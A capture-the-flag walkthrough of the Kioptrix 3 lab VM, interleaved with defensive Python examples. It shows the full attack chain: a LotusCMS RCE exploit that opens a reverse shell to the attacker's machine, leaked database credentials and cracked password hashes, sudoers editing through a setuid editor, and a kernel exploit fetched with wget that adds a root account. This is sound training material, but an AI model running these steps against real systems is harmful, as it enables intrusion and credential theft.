VM : Kioptrix: Level 1.2 (#3)
Download Link : https://download.vulnhub.com/kioptrix/KVM3.rar
VM HOST : VMware Workstation/Player
Network : Bridged mode with DHCP
Nmap Scan :
$ nmap -A 192.168.1.5 -oN nmap.scan
# Nmap 7.80 scan initiated Sun Apr 19 14:08:17 2020 as: nmap -A -oN nmap.scan 192.168.1.5
Nmap scan report for 192.168.1.5
Host is up (0.00050s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.8 - 2.6.30
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 0.04 ms 172.17.0.1
2 0.41 ms 192.168.1.5
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 19 14:08:27 2020 -- 1 IP address (1 host up) scanned in 9.80 seconds
Findings :
* The Apache web server is running on port 80.
* SSH is running on port 22.
Checking the web app
$ python urlCroll.py http://kioptrix3.com/
http://kioptrix3.com/index.php?page=index
http://kioptrix3.com/index.php?system=Blog
http://kioptrix3.com/index.php?system=Admin
http://kioptrix3.com//gallery
Link : urlCroll.py
Also note that the web app is using LotusCMS.
There is also a gallery app, but to access all of its content, map the VM's IP address to kioptrix3.com by adding it to the /etc/hosts file (sudo has to wrap the write itself, not just the echo, because the redirection is performed by the unprivileged shell) :
$ echo '192.168.1.5 kioptrix3.com' | sudo tee -a /etc/hosts
The URL of the gallery app is : http://kioptrix3.com/gallery
Scanning Web Application :
nikto scan output
$ nikto -host kioptrix3.com
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 192.168.1.5
+ Target Hostname: kioptrix3.com
+ Target Port: 80
+ Start Time: 2020-04-20 18:46:19 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: 0x46b9ece7ac600
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.4.4)
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Cookie phpMyAdmin created without the httponly flag
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6544 items checked: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2020-04-20 18:46:28 (GMT5.5) (9 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
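The nikto findings above (PHPSESSID cookie set without HttpOnly, no X-Frame-Options, version-revealing Server and X-Powered-By headers) can all be checked from a single captured response. The following is an added example, not code from the original walkthrough or from nikto; it audits a constructed response head modelled on the nikto output and a hardened variant of it, and runs offline against any head saved from `curl -i`:

```python
"""Response-header audit for the weaknesses nikto reported.

Added example (not part of the original walkthrough). The two response
heads below are constructed to mirror the nikto findings; they are not
captured traffic from the VM.
"""
from typing import List, Tuple

Header = Tuple[str, str]


def parse_raw_headers(raw: str) -> List[Header]:
    """Turn a raw HTTP response head (status line plus headers, as saved
    from `curl -i`) into lowercase-name/value pairs."""
    pairs: List[Header] = []
    for line in raw.strip().splitlines()[1:]:  # skip the status line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        pairs.append((name.strip().lower(), value.strip()))
    return pairs


def audit_headers(headers: List[Header]) -> List[str]:
    """Return one finding string per weakness; an empty list means clean."""
    findings: List[str] = []
    names = {n for n, _ in headers}

    # Session cookies: HttpOnly keeps them out of document.cookie (XSS),
    # Secure keeps them off plaintext HTTP.
    for name, value in headers:
        if name != "set-cookie":
            continue
        parts = [p.strip() for p in value.split(";")]
        cookie_name = parts[0].split("=", 1)[0]
        attrs = {p.lower() for p in parts[1:]}
        if "httponly" not in attrs:
            findings.append(f"cookie {cookie_name} set without HttpOnly")
        if "secure" not in attrs:
            findings.append(f"cookie {cookie_name} set without Secure")

    # Clickjacking: either X-Frame-Options or a CSP frame-ancestors directive.
    csp_frames = any(n == "content-security-policy" and "frame-ancestors" in v.lower()
                     for n, v in headers)
    if "x-frame-options" not in names and not csp_frames:
        findings.append("no X-Frame-Options / CSP frame-ancestors header (clickjacking)")

    # Version banners hand the scanner its "outdated" findings for free.
    for name, value in headers:
        if name in ("server", "x-powered-by") and any(c.isdigit() for c in value):
            findings.append(f"{name} header discloses a version: {value}")

    # TRACE shows up in the Allow header of an OPTIONS response.
    for name, value in headers:
        if name == "allow" and "trace" in value.lower():
            findings.append("TRACE method enabled (cross-site tracing)")
    return findings


def audit_raw(raw: str) -> List[str]:
    return audit_headers(parse_raw_headers(raw))


# Constructed to mirror the nikto output above (not a real capture).
SAMPLE_RESPONSE = """HTTP/1.1 200 OK
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.6
Set-Cookie: PHPSESSID=0123456789abcdef; path=/
Content-Type: text/html
"""

# The same response after hardening (constructed).
HARDENED_RESPONSE = """HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=0123456789abcdef; path=/; HttpOnly; Secure; SameSite=Lax
X-Frame-Options: SAMEORIGIN
Content-Type: text/html
"""

if __name__ == "__main__":
    for finding in audit_raw(SAMPLE_RESPONSE):
        print("-", finding)
    print("hardened:", audit_raw(HARDENED_RESPONSE) or "clean")
```

The sample head produces five findings (the two cookie flags, the missing anti-clickjacking header, and the two version banners); the hardened head produces none. On Apache 2.2 the cookie flags come from PHP's `session.cookie_httponly` / `session.cookie_secure` settings, the version banner from `ServerTokens Prod`, and the frame header from `Header always set X-Frame-Options SAMEORIGIN`.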
The phpmyadmin directory is found. Similar results from dirb :
$ dirb http://kioptrix3.com | tee dirb.scan
==> DIRECTORY: http://192.168.1.5/cache/
+ http://192.168.1.5/favicon.ico (CODE:200|SIZE:23126)
+ http://192.168.1.5/index.php (CODE:200|SIZE:1819)
+ http://192.168.1.5/cache/index.html (CODE:200|SIZE:1819)
==> DIRECTORY: http://192.168.1.5/core/controller/
+ http://192.168.1.5/core/index.php (CODE:200|SIZE:0)
+ http://192.168.1.5/gallery/index.php (CODE:500|SIZE:5650)
+ http://192.168.1.5/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)
+ http://192.168.1.5/phpmyadmin/index.php (CODE:200|SIZE:8136)
+ http://192.168.1.5/phpmyadmin/phpinfo.php (CODE:200|SIZE:0)
+ http://192.168.1.5/style/admin.php (CODE:200|SIZE:356)
+ http://192.168.1.5/style/index.php (CODE:200|SIZE:0)
+ http://192.168.1.5/core/controller/index.php (CODE:200|SIZE:0)
+ http://192.168.1.5/core/lib/index.php (CODE:200|SIZE:0)
+ http://192.168.1.5/core/model/index.php (CODE:200|SIZE:0)
+ http://192.168.1.5/core/view/index.php (CODE:200|SIZE:0)
+ http://kioptrix3.com/favicon.ico (CODE:200|SIZE:23126)
+ http://kioptrix3.com/index.php (CODE:200|SIZE:1819)
+ http://kioptrix3.com/cache/index.html (CODE:200|SIZE:1819)
+ http://kioptrix3.com/core/index.php (CODE:200|SIZE:0)
+ http://kioptrix3.com/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)
+ http://kioptrix3.com/phpmyadmin/index.php (CODE:200|SIZE:8136)
+ http://kioptrix3.com/phpmyadmin/phpinfo.php (CODE:200|SIZE:0)
+ http://kioptrix3.com/style/admin.php (CODE:200|SIZE:356)
+ http://kioptrix3.com/style/index.php (CODE:200|SIZE:0)
+ http://kioptrix3.com/core/controller/index.php (CODE:200|SIZE:0)
+ http://kioptrix3.com/core/lib/index.php (CODE:200|SIZE:0)
+ http://kioptrix3.com/core/model/index.php (CODE:200|SIZE:0)
+ http://kioptrix3.com/core/view/index.php (CODE:200|SIZE:0)
And also the scan results from dirsearch :
$ ./dirsearch.py -u http://kioptrix3.com -e php,asp,aspx,jsp,html,zip,jar,sql --plain-text-report=dirsearchReport
$ cat dirsearchReport | grep 200
200 2KB http://kioptrix3.com/cache/
200 688B http://kioptrix3.com/core/fragments/moduleInfo.phtml
200 23KB http://kioptrix3.com/favicon.ico
200 2KB http://kioptrix3.com/index.php
200 2KB http://kioptrix3.com/index.php/login/
200 146B http://kioptrix3.com/modules/TinyMCE/TinyMCEModuleInfo.php
200 8KB http://kioptrix3.com/phpmyadmin/
We can access phpMyAdmin with the default user `admin` and a blank password, but with those credentials only the information_schema database is accessible.
Exploiting Lotus CMS :
A quick search for LotusCMS vulnerabilities shows that version 3.0 is vulnerable to RCE.
Link : https://github.com/Hood3dRob1n/LotusCMS-Exploit
To exploit this, start a listener on the attack machine.
$ wget https://github.com/Hood3dRob1n/LotusCMS-Exploit/raw/master/lotusRCE.sh
$ chmod +x lotusRCE.sh
$ ./lotusRCE.sh kioptrix3.com /
Path found, now to check for vuln....
</html>Hood3dRob1n
Regex found, site is vulnerable to PHP Code Injection!
About to try and inject reverse shell....
what IP to use?
192.168.1.3 <----- IP address of local machine
What PORT?
1234 <---- listener port number
OK, open your local listener and choose the method for back connect:
1) NetCat -exploit
2) NetCat /dev/tcp
3) NetCat Backpipe
4) NetCat FIFO
5) Exit
#? 1
and we get the reverse connection :
Listening on [0.0.0.0] (family 0, port 1234)
Connection from kioptrix3.com 37530 received!
whoami
www-data
Getting a tty shell :
python -c 'import pty;pty.spawn("/bin/sh")'
$
Enumerating files :
Looking at web directory :
$ pwd
pwd
/home/www/kioptrix3.com
$ ls
cache data gallery index.php style
core favicon.ico gnu-lgpl.txt modules update.php
$ cd gallery
$ ls
BACK gfooter.php logout.php readme.html tags.php
db.sql gfunctions.php p.php recent.php themes
g.php gheader.php photos register.php version.txt
gadmin index.php photos.php scopbin vote.php
gallery.php install.BAK post_comment.php search.php
gconfig.php login.php profile.php slideshow.php
$ cat gconfig.php
<?php
error_reporting(0);
/*
A sample Gallarific configuration file. You should edit
the installer details below and save this file as gconfig.php
Do not modify anything else if you don't know what it is.
*/
// Installer Details -----------------------------------------------
// Enter the full HTTP path to your Gallarific folder below,
// such as http://www.yoursite.com/gallery
// Do NOT include a trailing forward slash
$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";
$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";
In the web directory of the gallery we find the database credentials "root/fuckeyou". With them we can log in to phpMyAdmin, and in the gallery database we find two usernames with hashed passwords :
dreg fb887aabd50f243b3f155c0f85
loneferret 5badcaf789d3d1d09794d8f021f40f0e
These hashes are cracked with crackstation.net :
dreg : Mast3r
loneferret : starwars
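The hashes fell instantly because the gallery stores plain, unsalted hashes of dictionary words, so a precomputed table (which is all crackstation is) or a one-hash-per-word loop recovers them. The following is an added example, not code from the walkthrough or from the Gallarific application; it shows the dictionary lookup against a constructed mini wordlist and, beside it, the salted slow-KDF storage the application should have used. The loneferret hash is copied from the database listing above:

```python
"""Why the gallery password hashes cracked instantly, and what to store instead.

Added example (not part of the original walkthrough). The stored hash for
loneferret is copied from the database listing above; the wordlist is a
constructed stand-in for a real dictionary.
"""
import hashlib
import hmac
import os
from typing import Iterable, Optional

LONEFERRET_HASH = "5badcaf789d3d1d09794d8f021f40f0e"   # from the gallery database above

# Constructed mini wordlist; a real one has millions of entries.
WORDLIST = ["password", "123456", "letmein", "starwars", "Mast3r"]

PBKDF2_ROUNDS = 600_000  # OWASP's current PBKDF2-HMAC-SHA256 recommendation


def md5_hex(word: str) -> str:
    return hashlib.md5(word.encode()).hexdigest()


def lookup_md5(target_hex: str, words: Iterable[str]) -> Optional[str]:
    """Unsalted MD5 is a pure function of the password, so one hash per
    candidate word (or a precomputed table) recovers any dictionary password."""
    target_hex = target_hex.lower()
    for word in words:
        if md5_hex(word) == target_hex:
            return word
    return None


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Hardened storage: 16 random salt bytes plus a deliberately slow KDF.
    The salt defeats precomputed tables; the rounds make every guess cost."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return f"pbkdf2_sha256${PBKDF2_ROUNDS}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    algo, rounds, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(dk.hex(), dk_hex)   # constant-time comparison


if __name__ == "__main__":
    print("MD5 dictionary lookup:", lookup_md5(LONEFERRET_HASH, WORDLIST))
    record = hash_password("starwars")
    print("hardened record:", record)
    print("verify correct:", verify_password("starwars", record))
    print("verify wrong:  ", verify_password("starwar5", record))
```

Two records of the same password hashed with different salts differ, so a leaked table cannot be attacked with one precomputed dictionary, and each guess costs 600,000 HMAC iterations instead of one MD5.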
With the user "loneferret/starwars" we can successfully SSH into the machine :
$ ssh loneferret@192.168.1.5
loneferret@192.168.1.5's password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Mon Apr 20 04:26:57 2020 from 192.168.1.3
loneferret@Kioptrix3:~$ whoami
loneferret
loneferret@Kioptrix3:~$
But with this user we can't access the root directory :
loneferret@Kioptrix3:~$ cd /root
-bash: cd: /root: Permission denied
Privilege Escalation :
Method 1 :
There is a file CompanyPolicy.README, which describes the command 'sudo ht' :
loneferret@Kioptrix3:~$ cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
DG
CEO
loneferret@Kioptrix3:~$ sudo ht
sudo: no passwd entry for root!
loneferret@Kioptrix3:~$ which ht
/usr/local/bin/ht
loneferret@Kioptrix3:~$ ls -al /usr/local/bin/ht
-rwsr-sr-x 1 firefart root 2072344 2011-04-16 07:26 /usr/local/bin/ht
`ht` is a file editor/viewer/analyzer for executables. In this case it has the SUID bit set, which means it runs with root privileges, so we can edit files that require root access with it. That means we can escalate our privileges by editing the `/etc/sudoers` file to allow the user `loneferret` to run `/bin/su`, which gives us root access.
Open the file by :
$ sudo ht /etc/sudoers
Which looks like this :
To change it into text mode press `F6` and choose text mode.
We have to change '!/usr/bin/su' to '/bin/su'.
To edit the file, change the mode into "hex" (press F6) and press F4 to edit, now just put "20" (hex for space) in place of "!/usr" in "!/usr/bin/su", which looks like :
Before :
After :
and press F2 to save.
Now just run the command `sudo su`
loneferret@Kioptrix3:~$ sudo su
root@Kioptrix3:/home/loneferret# whoami
root
That's it, we get the root shell!!
Congrats.txt ht-2.0.18
root@Kioptrix3:~# cat Congrats.txt
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasn't that bad now was it.
Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone.
Difficulty is relative, keep that in mind.
The object is to learn, do some research and have a little (legal)
fun in the process.
I hope you enjoyed this third challenge.
Steven McElrea
aka loneferret
http://www.kioptrix.com
Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.
Main page CMS:
http://www.lotuscms.org
Gallery application:
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/
The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/
Also, all pictures were taken from Google Images, so being part of the
public domain I used them.
root@Kioptrix3:~#
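Method 1 works because of how the sudoers rule was written, not because of a bug in ht: a NOPASSWD rule hands a setuid editor to the user, and a '!' exclusion of su is not a boundary (sudoers(5) itself notes the user can run the same program from another path or a copy). The following is an added example, not part of the walkthrough, that audits sudoers rules for exactly those patterns. The VM's real /etc/sudoers is not shown on the page, so the sample rule is constructed from the page's description, and the hardened alternative is likewise an assumption:

```python
"""Audit sudoers rules for the pattern Method 1 exploited.

Added example (not part of the original walkthrough). The sample rule is
constructed from the page's description: a NOPASSWD rule granting the
setuid editor `ht` and a '!/usr/bin/su' exclusion. The VM's actual
/etc/sudoers is not shown on the page, so the exact text is assumed.
"""
import re
from typing import Dict, List

# Editors and pagers: run as root, any of them can rewrite /etc/sudoers or
# /etc/passwd, and most can spawn a shell.
EDITOR_LIKE = {"ht", "vi", "vim", "nano", "ed", "emacs", "less", "more"}

RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)


def parse_sudoers(text: str) -> List[Dict]:
    """Parse user-specification lines; Defaults, comments and blanks are skipped."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        rules.append({
            "user": m.group("user"),
            "host": m.group("host"),
            "runas": m.group("runas") or "root",
            "tags": [t.strip() for t in m.group("tags").split(":") if t.strip()],
            "cmds": [c.strip() for c in m.group("cmds").split(",")],
        })
    return rules


def audit_rule(rule: Dict) -> List[str]:
    user = rule["user"]
    findings = []
    for cmd in rule["cmds"]:
        program = cmd.lstrip("!").split()[0].rsplit("/", 1)[-1]
        if cmd.startswith("!"):
            findings.append(
                f"{user}: exclusion {cmd} is not a security boundary; the same "
                f"program is reachable under another path or as a copy")
        elif program in EDITOR_LIKE:
            findings.append(
                f"{user}: {cmd} runs as {rule['runas']} and can edit any file, "
                f"including /etc/sudoers itself")
        elif cmd == "ALL" and user != "root":
            findings.append(f"{user}: unrestricted ALL command")
    if "NOPASSWD" in rule["tags"]:
        findings.append(
            f"{user}: NOPASSWD means any code running as {user} gets root without a password")
    return findings


def audit_sudoers(text: str) -> List[str]:
    return [f for rule in parse_sudoers(text) for f in audit_rule(rule)]


# Constructed to match the page's description; not the VM's actual file.
SAMPLE_SUDOERS = """Defaults env_reset
root       ALL=(ALL) ALL
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
"""

# Hardened alternative (constructed): sudoedit of one named file, password required.
HARDENED_SUDOERS = """Defaults env_reset
root       ALL=(ALL) ALL
loneferret ALL=(root) sudoedit /srv/www/CompanyPolicy.README
"""

if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS):
        print("-", finding)
    print("hardened:", audit_sudoers(HARDENED_SUDOERS) or "clean")
```

The sample rule yields three findings (the exclusion, the editor, NOPASSWD); the hardened rule yields none, because sudoedit copies the named file to a temporary location, runs the editor as the calling user, and only copies the result back, so the editor never runs as root.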
Method 2 :
We are using this method within the reverse shell obtained by the LotusCMS exploit.
First check the version of the OS and kernel :
$ cat /etc/issue
Ubuntu 8.04.3 LTS \n \l
$ cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04.3 LTS"
$ uname -a
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
$ cat /proc/version
Linux version 2.6.24-24-server (buildd@palmer) (gcc version 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) #1 SMP Tue Jul 7 20:21:17 UTC 2009
So the kernel version is 2.6.24. Searching for an exploit for Linux kernel 2.6.24, I found the following exploit : https://www.exploit-db.com/exploits/40839
According to its documentation the exploit creates a new user 'firefart' with root privileges; download it and test it.
$ cd /tmp
$ wget 192.168.1.3:8000/exploit.c
$ gcc -pthread exploit.c -o exploit -lcrypt
exploit.c:193:2: warning: no newline at end of file
$ ./exploit
./exploit
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 12345
Complete line:
firefart:fi3LLch28IK7A:0:0:pwned:/root:/bin/bash
mmap: b7fe0000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '12345'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
The exploit seems to work; now try to log in as the new user "firefart" with password 12345 :
$ su firefart
Password: 12345
firefart@Kioptrix3:/tmp# cd /root
firefart@Kioptrix3:~# ls
Congrats.txt ht-2.0.18
firefart@Kioptrix3:~# cat Congrats.txt
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
We can access the /root directory.
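Method 2 leaves two artifacts a defender can detect: the line `firefart:fi3LLch28IK7A:0:0:pwned:/root:/bin/bash` in /etc/passwd (a second UID 0 account carrying its hash in passwd instead of shadow) and the backup the exploit itself writes to /tmp/passwd.bak. The following is an added example, not part of the walkthrough or of the exploit; it parses passwd content, flags those changes, and diffs a backup against the live file. The passwd contents are constructed except for the firefart line, which is copied from the exploit output above:

```python
"""Detect what the Method 2 exploit leaves in /etc/passwd.

Added example (not part of the original walkthrough). Both passwd samples
are constructed; only the firefart line is copied from the exploit output.
"""
from typing import List, NamedTuple, Tuple


class PasswdEntry(NamedTuple):
    name: str
    passwd: str   # 'x' means the hash lives in /etc/shadow
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text: str) -> List[PasswdEntry]:
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        entries.append(PasswdEntry(fields[0], fields[1], int(fields[2]),
                                   int(fields[3]), fields[4], fields[5], fields[6]))
    return entries


def audit_passwd(text: str) -> List[str]:
    """Flag the changes a passwd-overwrite exploit makes."""
    findings = []
    entries = parse_passwd(text)
    for e in entries:
        if e.uid == 0 and e.name != "root":
            findings.append(f"{e.name}: UID 0 account other than root")
        if e.passwd not in ("x", "*", "!", ""):
            findings.append(f"{e.name}: password hash stored in world-readable /etc/passwd")
    names = [e.name for e in entries]
    for name in sorted(set(names)):
        if names.count(name) > 1:
            findings.append(f"{name}: duplicate account name")
    return findings


def changed_entries(before: str, after: str) -> Tuple[List[str], List[str], List[str]]:
    """Compare a backup (such as /tmp/passwd.bak) with the live file:
    returns (added, removed, modified) account names."""
    b = {e.name: e for e in parse_passwd(before)}
    a = {e.name: e for e in parse_passwd(after)}
    added = sorted(set(a) - set(b))
    removed = sorted(set(b) - set(a))
    modified = sorted(n for n in set(a) & set(b) if a[n] != b[n])
    return added, removed, modified


# Constructed clean file.
CLEAN_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash
"""

# Same file after the exploit; the last line is the one printed by the exploit above.
AFTER_EXPLOIT_PASSWD = CLEAN_PASSWD + "firefart:fi3LLch28IK7A:0:0:pwned:/root:/bin/bash\n"

if __name__ == "__main__":
    for finding in audit_passwd(AFTER_EXPLOIT_PASSWD):
        print("-", finding)
    print("added/removed/modified:", changed_entries(CLEAN_PASSWD, AFTER_EXPLOIT_PASSWD))
```

Run periodically (or from a file-integrity monitor hooked on /etc/passwd), the audit raises two findings for the post-exploit file and the diff names the added account; the clean file produces neither.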